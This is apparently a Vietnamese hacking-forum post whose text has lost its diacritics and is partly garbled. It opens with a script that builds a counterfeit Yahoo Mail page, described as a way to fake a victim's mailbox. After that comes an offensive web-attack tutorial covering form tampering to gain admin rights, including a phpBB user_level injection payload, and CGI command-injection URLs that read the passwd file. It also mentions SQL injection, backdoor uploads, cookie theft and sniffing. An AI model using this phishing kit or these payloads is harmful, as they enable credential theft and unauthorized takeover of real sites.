clrar.value+=" <B>15%</B> of your <B>4.0MB</B> limit.</SMALL> \n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=1 width="+K+"100%"+K+" bgColor=black \n" clrar.value+=" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+="<TR>\n" clrar.value+=" <TD>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD \n" clrar.value+=" style="+K+"BORDER-RIGHT: 0px; BORDERTOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px"+K+" \n" clrar.value+=" width="+K+"15%"+K+" bgColor=green height=10><SPACER height="+K+"8"+K+" \n" clrar.value+=" width="+K+"2"+K+" type="+K+"block"+K+"></TD>\n" clrar.value+=" <TD \n" clrar.value+=" style="+K+"BORDER-RIGHT: 0px; BORDERTOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px"+K+" \n" clrar.value+=" width="+K+"85%"+K+" bgColor=white height=10><SPACER height="+K+"8"+K+" \n" clrar.value+=" width="+K+"2"+K+" \n" clrar.value+=" type="+K+"block"+K+"></TD></TR></TBODY></TABLE> </TD></TR></TBODY></TABLE><NOBR><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/welcome/storag e/evt=194/*https://ordering.yahoo.com/or/ypm/splash?577 &amp;Pkgs=us:ym:space&amp;.osig=3Anzm"+K+" \n" clrar.value+=" target=_blank><B>Get a bigger mailbox</B></A> for only $9.99/year! \n"

clrar.value+=" </NOBR><BR><BR>\n" clrar.value+=" <CENTER>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD align=middle><FONT face=arial \n" clrar.value+=" size=-2>ADVERTISEMENT</FONT><BR><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=256608.3514699.47964 02.1433188/D=mail/S=150500014:LREC/A=1642149/R=0/ SIG=1339il57r/*http://ads.x10.com/?type=href&amp;lineid =3514699&amp;property=mail&amp;aposition=LREC&amp; random=1057492859486309"+K+"><IMG \n" clrar.value+=" height=250 alt="+K+""+K+" \n" clrar.value+=" src="+K+"300x250ddaaq.gif"+K+" \n" clrar.value+=" width=300 \n" clrar.value+=" border=0></A></TD></TR></TBODY></TABLE></CENTE R><BR></TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=bgd bgColor=#9bbad6 colSpan=2><IMG height=2 alt="+K+""+K+" \n" clrar.value+=" src="+K+"space.gif"+K+" width=40></TD>\n" clrar.value+=" <TD vAlign=top bgColor=white>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR class=bgd bgColor=#9bbad6>\n" clrar.value+=" <TD width=5 height=5><IMG height=5 alt="+K+""+K+" \n" clrar.value+=" src="+K+"rddl1.gif"+K+" \n" clrar.value+=" width=5></TD></TR></TBODY></TABLE></TD></TR>< /TR></TBODY></TABLE><!-- SpaceID=150500014 loc=PU noad -->\n"

clrar.value+="<TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR class=bgd bgColor=#e4ecf6>\n" clrar.value+=" <TD align=left>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=2 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tbutton \n" clrar.value+=" onclick="+K+"window.open('/ym/ShowFolder?rb=Inbox&am p;YY=33422&amp;YN=1', '_top')"+K+" \n" clrar.value+=" width=100><A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/ShowFolder? rb=Inbox&amp;reset=1&amp;YY=33422&amp;YN=1"+K+" >Check \n" clrar.value+=" Mail</A> </TD>\n" clrar.value+=" <TD>&nbsp;</TD>\n" clrar.value+=" <TD class=tbutton \n" clrar.value+=" onclick="+K+"window.open('/ym/Compose?YY=33422', '_top')"+K+" width=100><A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Compose?YY =33422"+K+">Compose</A>\n" clrar.value+=" </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD vAlign=bottom align=right>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=bge bgColor=#e4ecf6><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/nav/?http://billi ng.mail.yahoo.com/bm/Upgrades"+K+" \n" clrar.value+=" target=_blank>Mail Upgrades</A> - <A \n"

clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Search?YY=3 3422"+K+">Search \n" clrar.value+=" Mail</A> - <A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Options?YY= 33422"+K+"><B>Mail \n" clrar.value+=" Options</B></A></TD></TR></TBODY></TABLE></TD> </TR></TBODY></TABLE>\n" clrar.value+="<CENTER>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=4 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Welcome?YY =33422"+K+">Mail</A>&nbsp;- \n" clrar.value+=" &nbsp;<A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/footer/ab/?http ://address.yahoo.com/yab/us"+K+">Address \n" clrar.value+=" Book</A> - <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/footer/cal/?http ://calendar.yahoo.com"+K+">Calendar</A> \n" clrar.value+=" - <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/footer/note/?htt p://notepad.yahoo.com"+K+">Notepad</A></TD></TR>< /TBODY></TABLE></CENTER><BR>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD bgColor=#a0b8c8>\n" clrar.value+=" <TABLE cellSpacing=1 cellPadding=1

width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR vAlign=top bgColor=#ffffff>\n" clrar.value+=" <TD align=middle><FONT face=arial size=2><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://address.y ahoo.com/"+K+">Address&nbsp;Book</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://auctions. yahoo.com/"+K+">Auctions</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://autos.yah oo.com/"+K+">Autos</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://briefcase. yahoo.com/"+K+">Briefcase</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://calendar. yahoo.com/"+K+">Calendar</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://chat.yaho o.com/"+K+">Chat</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://classified s.yahoo.com/"+K+">Classifieds</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://finance.y ahoo.com/"+K+">Finance</A> \n" clrar.value+=" <A \n" clrar.value+="

href="+K+"http://us.rd.yahoo.com/footer/*http://games.ya hoo.com/"+K+">Games</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://geocities. yahoo.com/"+K+">Geocities</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://greetings .yahoo.com/"+K+">Greetings</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://groups.ya hoo.com/"+K+">Groups</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://health.ya hoo.com/"+K+">Health</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://astrology. yahoo.com/yastro/"+K+">Horoscopes</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://hotjobs.y ahoo.com/"+K+">HotJobs</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://www.yah ooligans.com/"+K+">Kids</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://mail.yaho o.com/"+K+">Mail</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://maps.yah oo.com/"+K+">Maps</A> \n"

clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://members .yahoo.com/"+K+">Member&nbsp;Directory</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://messeng er.yahoo.com/"+K+">Messenger</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://mobile.ya hoo.com/"+K+">Mobile</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://movies.y ahoo.com/"+K+">Movies</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://launch.ya hoo.com/"+K+">Music</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://my.yahoo .com/"+K+">My&nbsp;Yahoo!</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://news.yah oo.com/"+K+">News</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://paydirect .yahoo.com/"+K+">PayDirect</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://personals .yahoo.com/"+K+">Personals</A> \n" clrar.value+=" <A \n" clrar.value+="

href="+K+"http://us.rd.yahoo.com/footer/*http://pets.yaho o.com/"+K+">Pets</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://photos.ya hoo.com/"+K+">Photos</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://platinum. yahoo.com/"+K+">Platinum</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://shopping. yahoo.com/"+K+">Shopping</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://sports.ya hoo.com/"+K+">Sports</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://tv.yahoo. com/"+K+">TV</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://travel.ya hoo.com/"+K+">Travel</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://weather. yahoo.com/"+K+">Weather</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://yp.yahoo. com/"+K+">Yellow&nbsp;Pages</A> \n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/footer/*http://docs.yah oo.com/docs/family/more.html"+K+">more...</A></FONT

></TD></TR></TBODY></TABLE></TD></TR></TBODY ></TABLE><!-- SpaceID=150500014 loc=FOOT noad ->\n" clrar.value+="<script language=javascript> var ADFadids = "+K+"1522466,1522468,1453288,1453290,1579788,16436 59,1455139,1657277,1642781,1642149,1544483,1052425" +K+"; function ADFlaunch() {var w; var l="+K+"http://rd.yahoo.com/M=224039.2020109.3495275. 1958505/D=mail/S=150500014:FOOT2/A=1052425/R=0/id =adfeedback/SIG=12ecvkvil/*http://promo.yahoo.com/adfe edback/?page=150500014:FOOT2&property=mail&adids="+ K+"+ADFadids; w=window.open(l,"+K+"AdFeedbackWin"+K+","+K+"toolba r=no,scrollbars=yes,resizable,location=no,height=400,width =640"+K+"); }</"+F+"CRIPT>\n" clrar.value+="<CENTER><SMALL><BR>Copyright 19942003 <A \n" clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2 020109.3495275.1958505/D=mail/S=150500014:FOOT2/A =1052425/R=1/SIG=11n7g195d/*http://rd.yahoo.com/mail _us/tos/?http://www.yahoo.com"+K+" \n" clrar.value+="target=_blank>Yahoo!</A> Inc. All rights reserved. <A \n" clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2 020109.3495275.1958505/D=mail/S=150500014:FOOT2/A =1052425/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/in fo/terms/"+K+">Terms \n" clrar.value+="of Service</A> - <A \n" clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2 020109.3495275.1958505/D=mail/S=150500014:FOOT2/A =1052425/R=3/SIG=11lp7krrc/*http://docs.yahoo.com/info /copyright/copyright.html"+K+">Copyright \n" clrar.value+="Policy</A> - <A \n" clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2 020109.3495275.1958505/D=mail/S=150500014:FOOT2/A =1052425/R=4/SIG=11he80eif/*http://docs.yahoo.com/inf o/guidelines/mail.html"+K+">Guidelines</A> \n" clrar.value+="- <A

href="+K+"javascript:ADFlaunch()"+K+">Ad Feedback</A><BR>NOTICE: We collect \n" clrar.value+="personal information on this site.<BR>To learn more about how we use your \n" clrar.value+="information, see our <A \n" clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2 020109.3495275.1958505/D=mail/S=150500014:FOOT2/A =1052425/R=5/SIG=11b5p6lhe/*http://privacy.yahoo.com/ privacy/us/mail/"+K+">Privacy \n" clrar.value+="Policy</A></SMALL></CENTER>\n" clrar.value+="<script>\n" clrar.value+="var ypim_MA_Farm_URL = "+K+"http://us.f137.mail.yahoo.com"+K+";\n" clrar.value+="var ypim_AB_URL = "+K+"http://address.yahoo.com/yab/us"+K+";\n" clrar.value+="var ypim_CA_URL = "+K+"http://calendar.yahoo.com"+K+";\n" clrar.value+="var ypim_NP_URL = "+K+"http://notepad.yahoo.com"+K+";\n" clrar.value+="var ypim_MA_YY = "+K+"128340"+K+";\n" clrar.value+="var ypim_IMG = "+K+"http://us.i1.yimg.com/us.yimg.com/i/us/pim"+K+";\n " clrar.value+="var ypim_Loc = "+K+"us"+K+";\n" clrar.value+="var ypim_IsCalendarView = false;\n" clrar.value+="var ypim_IsNotepadView = false;\n" clrar.value+="var ypim_i18n_CheckMail = "+K+"Check Mail"+K+";\n" clrar.value+="var ypim_i18n_Compose = "+K+"Compose"+K+";\n" clrar.value+="var ypim_i18n_Folders = "+K+"Folders"+K+";\n" clrar.value+="var ypim_i18n_Search = "+K+"Search"+K+";\n" clrar.value+="var ypim_i18n_Options = "+K+"Options"+K+";\n" clrar.value+="var ypim_i18n_Help = "+K+"Help"+K+";\n" clrar.value+="var ypim_i18n_AddContact = "+K+"Add

Contact"+K+";\n" clrar.value+="var ypim_i18n_AddCategory = "+K+"Add Category"+K+";\n" clrar.value+="var ypim_i18n_AddList = "+K+"Add List"+K+";\n" clrar.value+="var ypim_i18n_ViewContacts = "+K+"View Contacts"+K+";\n" clrar.value+="var ypim_i18n_ViewLists = "+K+"View Lists"+K+";\n" clrar.value+="var ypim_i18n_Quickbuilder = "+K+"Quickbuilder"+K+";\n" clrar.value+="var ypim_i18n_ImportContacts = "+K+"Import Contacts"+K+";\n" clrar.value+="var ypim_i18n_Synchronize = "+K+"Synchronize"+K+";\n" clrar.value+="var ypim_i18n_AddressesOptions = "+K+"Addresses Options"+K+";\n" clrar.value+="var ypim_i18n_AddressesHelp = "+K+"Addresses Help"+K+";\n" clrar.value+="var ypim_i18n_AddEvent = "+K+"Add Event"+K+";\n" clrar.value+="var ypim_i18n_AddTask = "+K+"Add Task"+K+";\n" clrar.value+="var ypim_i18n_AddBirthday = "+K+"Add Birthday"+K+";\n" clrar.value+="var ypim_i18n_Day = "+K+"Day"+K+";\n" clrar.value+="var ypim_i18n_Week = "+K+"Week"+K+";\n" clrar.value+="var ypim_i18n_Month = "+K+"Month"+K+";\n" clrar.value+="var ypim_i18n_Year = "+K+"Year"+K+";\n" clrar.value+="var ypim_i18n_EventList = "+K+"Event List"+K+";\n" clrar.value+="var ypim_i18n_Reminders = "+K+"Reminders"+K+";\n" clrar.value+="var ypim_i18n_Tasks = "+K+"Tasks"+K+";\n" clrar.value+="var ypim_i18n_Sharing = "+K+"Sharing"+K+";\n"

clrar.value+="var ypim_i18n_Synchronize = "+K+"Synchronize"+K+";\n" clrar.value+="var ypim_i18n_CalendarOptions = "+K+"Calendar Options"+K+";\n" clrar.value+="var ypim_i18n_CalendarHelp = "+K+"Calendar Help"+K+";\n" clrar.value+="var ypim_i18n_AddNote = "+K+"Add Note"+K+";\n" clrar.value+="var ypim_i18n_AddFolder = "+K+"Add Folder"+K+";\n" clrar.value+="var ypim_i18n_ViewNotes = "+K+"View Notes"+K+";\n" clrar.value+="var ypim_i18n_NotepadOptions = "+K+"Notepad Options"+K+";\n" clrar.value+="var ypim_i18n_NotepadHelp = "+K+"Notepad Help"+K+";\n" clrar.value+="</"+F+"CRIPT>\n" clrar.value+="<script src="+K+"pulldowns.js"+K+"></"+F+"CRIPT>\n" clrar.value+="<DIV id=mail></DIV>\n" clrar.value+="<DIV id=addr></DIV>\n" clrar.value+="<DIV id=cal></DIV>\n" clrar.value+="<DIV class=menubg id=note></DIV><!-SpaceID=150500014 loc=FAD noad --><!-SpaceID=150500014 loc=RS noad --><!-- UM: 0.002 -><!-- v3.3.7.1 1055892397 --><!-- 0.04509 --><!-web13705.mail.yahoo.com compressed Sun Jul 6 05:00:59 PDT 2003 --></BODY></HTML>\n" } function dis(){ if (tar.checked==true){tar2.disabled=false} if (tar.checked==false){tar2.disabled=true} } </SCRIPT> <BR><INPUT onclick=gene() type=button value="Vie^'t code cua Fake

mailbox">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT onclick='clrar.createTextRange().execCommand("SelectAll") ;clrar.createTextRange().execCommand("Copy");' type=button value="Copy toan` bo^. code"><BR><BR> <b><font color="#FF0000">Tao. 1 trang htm voi'' noi dung la` toan` bo^. noi^. dung trong box de^* lam` trang Fake mailbox, gia mao mail box victim</font></b><BR><BR> <TEXTAREA name=clrar rows=16 cols=105> </TEXTAREA> <BR><BR>&nbsp;</SPAN></p> </p> </BODY></HTML> Good tool ch ???? hihihi, cn khong 3-4 Tool na ti ang vit, s hng dn cc bn s dng c hiu qu sau, lm th no nh u trng mi khoi ... he he he

Author by : tsbeginnervn ( Staff of HVA ) Website : http:// www.vnhacker.org/forum/ Edit by : PTV5 Group Website : http://www.ptv5online.com ; http://www.ptv5online.net

######################################################### ############## 1-Tn cng vo vng n: Nhng phn b du i trong trang WEB thng cha nhng thng tin v cc phin lm vic ca "clien",cc phin lm vic ny thng ghi my khch(clien) ch khng t chc CSDL trn my ch,v vy ta c th dng chc nng "View Source" ca trnh duyt c phn b du i v t c th tm ra s h ca trang WEB m ta mun tn cng,ta c th truy cp vo h thng ca my ch ny... V d c mt website cho php bn sa cc cp thnh vin lm Mod, Member, Banned, nhng khng cho php sa ln thnh Admin. Bn th view code, bn c th thy nh sau:(y l v d thi tu trng hp) QUOTE ..... <form action="" method="post" name="settings" > ..... <select class=search name=status> <option value=1>Moderator</option> <option selected value=2>Member</option> <option value=3>Banned</option> </select> .....

Hy suy lun mt t nh: Banned: value=3, Member:

value=2, Moderator: value=1. Vy th Admin l my??? C th l 0 okie tip tc no: Lu li trang setting member , edit HTML code trong , sa li on Select:

QUOTE ..... <form action="" method="post" name="settings" > ..... <select class=search name=status> <option value=0>Admin </option> <option value=1>Moderator</option> <option selected value=2>Member</option> <option value=3>Banned</option> </select> ..... By gi hy m trang web ln v nhn "submit" no,vn khng c chuyn g xy ra c sao vy qun xem ch ny: <form action="" th khi nhn "submit" th n truyn d liu l cc bin cho file n ang load vy ta hy sa li mt t nh ta copy url trn trnh duyt m ta ang lu file v d: QUOTE http://www.tinhban.com/phpbb/member.php

vy s tr thnh nh sau: QUOTE ..... <form action="http://www.tinhban.com/phpbb/member.php" method="post" name="settings" > ..... <select class=search name=status> <option value=0>Admin </option> <option value=1>Moderator</option> <option selected value=2>Member</option> <option value=3>Banned</option> </select> .....

By gi nhn "submit" mt ln na xem sao,bn c th thnh cng nu nh code u vng mt s trng hp p dng rt tt y Mt v d in hnh na l ta c th truy cp thnh ADMIN ca forum phpbb 1.4.1 thng qua vic sa i thng tin n ca trang web truy cp vo h thng vi quyn cao hn Version phpbb 1.4.1 nng k lm thnh vin v vo profile v "View Source" v sa i nh sau:

Thay th dng: QUOTE <input type="checkbox" name="viewemail' value="1"> thnh QUOTE <input type="text" name="viewemail' value="1',user_level=4'"> Sa QUOTE <form action="./profile.php" method="post"> Thnh QUOTE <form action="http://target/phpbb2/profile.php" method="post"> v nhn "submit" >bn tr thnh admin ca forum tht d dng phi khng 2-Can thip vo tham s trn URL: y l cch tn cng a tham s trc tip vo URL,k tn cng c th dng cc cu lnh SQL khai thc CSDL trn server b li,in hnh nht l tn cng bng li "SQL INJECT"(ch : Hu ht cc trang web ca VN u b li ny) cch khai thc li ny hy c k bi vit ca WINDAK v Nhm Vicki v cc bi vit lin quan ca

cc thnh vin trong forum ca chng ta,tn cng kiu ny rt gn nh nhng v cng hiu qu ch dng cng c tn cng duy nht l trnh duyt WEB v backdoor(up ln server) li khyn nn dng minibrowse vo http://flash.to/nhomvicki m download v n khng b li time out. 3-Tn cng dng cookie: Gii thiu v cookie cookie l nhng phn d liu nh c cu tr c chia s gia web site v browser ca ngi dng. cookies c lu tr di nhng file d liu nh dng text (size di 4k). Chng c cc site to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm site v nhng vng m h i qua trong site. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quen... cookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh, ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin v ngi dng c lu tr trong cookie. nhng ln truy cp sau n site , web site c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1 forum...) m ngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng tin khc. Vn t ra l c nhiu site qun l vic dng li cc thng tin lu trong cookie ko chnh xc, kim tra ko y hoc m ho cc thng tin trong cookie cn s h gip cho hacker khai thc vt qua cnh ca ng nhp, ot quyn iu khin site; cng c nhiu site s dng nhng thng tin c nhn ca ngi dng phc v cho cc mc ch khc nh qung co, hoc thm ch bn thng tin ca ngi dng cho khch hng khc (vd: nu t nhin bn nhn vi email qung co

mi ngy c gi vo mail box ca bn m ko bit ti sao, th c th l thng tin c nhn ca bn b mt site no m bn tng xem s dng) Cc thnh phn ca cookie Tn: do ngi lp trnh web site chn Domain: l tn min t server m cooki e c to v gi ng dn: thng tin v ng dn web site m bn ang xem Ngy ht hn: l thi im m cookie ht hiu lc\ Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho trong qu trnh truyn gia server v browser. Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v sau cc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong 4k. cookies ca Netscape (NS) t trong file cookies.txt, trong th mc ci t NS \Users\default (hoc \User\Yourname), cn ca IE thng t trong \Documents and Settings\Username\cookies\username@sitename.txt. (i vi win9x, th mc cookies nm trong th mc Windows/cookies) Netscape l trnh duyt u tin s dng cookie, k n l IE ca microsoft. Cc thng tin khc v cookie thm v cookie, cc bn c th tham kho thm http://www.cooki_ecentral.com/ Khai thc cookie u im ca vic s dng cookie r rng, vic lu tr v dng li cc thng tin ng nhp s gip ngi dng tit kim thi gian trong vic duyt cc web site. Tuy

nhin, bn cnh nhng li ch ca n. cookie l mt trong nhng nguyn nhn gy tit l thng tin ring t ca ngi dng. Nhng ngi bit tn dng nhng thng tin ny c th gy nn nhng hu qu nghim trng. VD: mt hacker lm vic mt ngn hng c th tm cch xem thng tin trong cookie ca khch hng v s dng thng tin ny truy cp vo acc ca khch hng . Hoc hacker c th tm cch trm cookie ca admin 1 website v t c th d dng chim c quyn iu khin site. Nhng browser hin nay cho php ngi dng kha cookie hoc hi h trc khi lu li cookie trn h thng. Cng c nhiu software gip ngi dng qun l tt cookie, gip ngn chn hoc cnh bo nhng nguy c c th gy hi. (Cn tip: ti s gii thiu cho cc bn cch hack mt vi kiu forum bng cch khai thc thng tin trong cookie v phng php ly cookie t mt vi kiu forum cha fix) 4-Cc l hng bo mt: Hin nay cc l hng c pht hin ra ngy cng nhiu v h iu hnh,my ch WEB,v cc phn mm ca cc hng khc...Tuy khi pht hin ra c v c b sung cc bng path nhng cc khch hng khng cp nht thng xuyn nn l c hi cho cc hacker tn cng.Hin nay trong box li bo mt ca chng ta cc li bo mt lun c cp nht thng xuyn(nh c i ng Mod nng ng nh L...)cn vic khai thc cc l hng nh th no th tuy thuc s linh hot nng ng ca tng ngi...Ch khgn th hng dn tng chi tit mt cho cc bn c v cn rt nhiu vic phi lm na nn cc bn phi t my m tm hiu b sung vo kin thc ca mnh

5-Cu hnh khng an ton: y l l hng do ng dng c cc thit lp mc nh khng an ton hoc do ngi qun tr h thng nh cu hnh khng an ton. V d nh cu hnh Web server cho php by k ai cng c quyn duyt qua h thng th mc. Vic ny c th lm l cc thng tin nhy cm nh m ngun, mt khu hay thng tin ca khch hng. Vit cu hnh khng an ton ny rt nguy him v khi ta duyt c cc file nh pass th ta c th download v gii m...C rt nhiu li v cu hnh khng an ton ny, lm cho khng bao nhiu ngi phi khn n. 6-Trn b m: Tnh trng trn b m xy ra khi d liu c gi n ng dng nhiu hn mong i. K thut tn cng ny c th lm cho h thng b t lit hoc lm cho h thng mt kh nng kim sot. Xem bi vit ca nhm Vicki v cch khai thc li trn b m Chn m lnh: y l k thut chn m lnh vo trang Web t my khch. K thut ny cho php hacker a m lnh thc thi vo phin lm vic trn Web ca mt ngi dng khc. Khi on m lnh ny chy, n s cho php hacker lm th chuyn, t gim st phin lm vic trn Web cho n ton quyn iu khin my tnh ca kh ch. Mt v d in hnh l li ca web dng cgi cc hacker c th dng lnh unix trn trnh duyt ca mnh

nh v d sau: QUOTE http://target/index.cgi?page=index.cgi http://target/index.cgi?page=index.cgi >xem m ngun file index.cgi http://target/index.cgi?page=index.cgiswd >xem file passwd ca server http://target/index.cgi?page=index.cgils -la http://target/index.cgi?page=index.cgi http://target/index.cgi?page=index.cgi >dng lnh unix Bn phi linh hot trong cch tn cng ca mnh 7-Khng cn log-in: Nu ng dng khng c thit k cht ch, khng rng buc trnh t cc bc khi duyt ng dng th y s l mt l hng bo mt v hacker c th li dng truy cp thng n cc trang thng tin bn trong m khng cn phi qua bc ng nhp. 8-Eavesdropping(nghe trm): Mt cch chung chung phn ln cc h thng mng truyn t thng tin qua mng khng cht chn lm,nn n gip cc Attacker c th truy cp vo data paths "listen in" hoc "read" lung d liu chuyn qua.Khi cc Attacker nghe trm s truyn t thng tin n s

chuyn n "sniffing" or "snooping".Nng lc ca nghe trm l gim st h thng mng n s thu thp c nhng thng tin qu gi v h thng ,c th l mt packet cha passwd v user.Cc chng trnh ny gi l cc "sniffing" c nhim v lng nghe cc cng ca mt h thng m cc hacker mun tn cng,n s thu thp cc d liu chuyn qua cc cng ny v chuyn v cho cc attacker. 9-Data Modification(thay i d liu): Sau khi cc attacker c c d liu ca mt h thng no ,h c th thay i m khng cn quan tm n ngi gi v ngi nhn.Thm ch n khng c i hi s cn trng trong s chuyn dch thng tin ,th bn c th sa i nhng thng tn t nhng packet ny mt cch d dng v d nh trong mt cuc giao dich no bn c th thay i thng tin v gi tr ca sn phm...C nhiu th m cc ATK quan tm(hy cn thn) 10-Password-Based Attacks: Thng thng mt h thng no khi mi cu hnh th cng c mt User v pass mt nh,nhng mt s admin ca h thng sau khi config xong th khng i,y l c hi c th gip cc ATK xm nhp vo mt cch ng ng chnh chnh,khi vo ri th h c th to thm user,ci backdo cho ln ving thm sau...Li khuyn khi ci v config xong hay thay i pass mt nh. 11-Identity Spoofing (IP Address Spoofing): Hu nh cc h thng mng trn th gii ny u s

